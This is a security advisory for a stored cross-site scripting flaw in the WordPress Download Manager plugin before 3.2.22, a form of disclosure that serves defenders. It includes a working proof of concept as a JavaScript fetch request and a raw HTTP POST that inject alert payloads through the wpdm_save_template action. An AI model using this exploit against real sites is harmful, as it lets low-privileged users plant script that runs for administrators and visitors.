Lucene search
Krzysztof ZającWPEX-ID:01144C50-54CA-44D9-9CE8-BF4F659114EEHistoryNov 29, 2021 - 12:00 a.m.
Download Manager < 3.2.22 - Subscriber+ Stored Cross-Site Scripting
2021-11-2900:00:00
Krzysztof Zając
37
0.001 Low
EPSS
Percentile
46.9%
The plugin does not sanitise and escape Template data before outputting it in various pages (such as admin dashboard and frontend). Due to the lack of authorisation and CSRF checks in the wpdm_save_template AJAX action, any authenticated users such as subscriber is able to call it and perform Cross-Site Scripting attacks
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "tpl[content]=%3Cimg src onerror=alert(/XSS/)%3E&action=wpdm_save_template&tplid=2&tpl[css]=</style></head><body><img src onerror=alert(/XSS/)>",
"method": "POST",
})
.then(response => response.text())
.then(data => console.log(data));
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 150
Connection: close
Cookie: [any authenticated user]
tpl[content]=%3Cimg+src+onerror=alert(/XSS/)%3E&action=wpdm_save_template&tplid=2&tpl[css]=</style></head><body><img+src+onerror=alert(/XSS/)>
The XSS via tpl[content] triggers when previewing the template (as admin). The one from tpl[css] triggers in all frontend pages (as well as template preview)Related
cnvd
cnvd
openvas
openvas
WordPress Download Manager Plugin < 3.2.22 XSS Vulnerability
2022-03-01 00:00:00
patchstack
patchstack
wpvulndb
wpvulndb
Download Manager < 3.2.22 - Subscriber+ Stored Cross-Site Scripting
2021-11-29 00:00:00
nvd
nvd
CVE-2021-24969
2021-12-27 11:15:09
prion
prion
Cross site scripting
2021-12-27 11:15:00
cvelist
cvelist
cve
cve
CVE-2021-24969
2021-12-27 11:15:09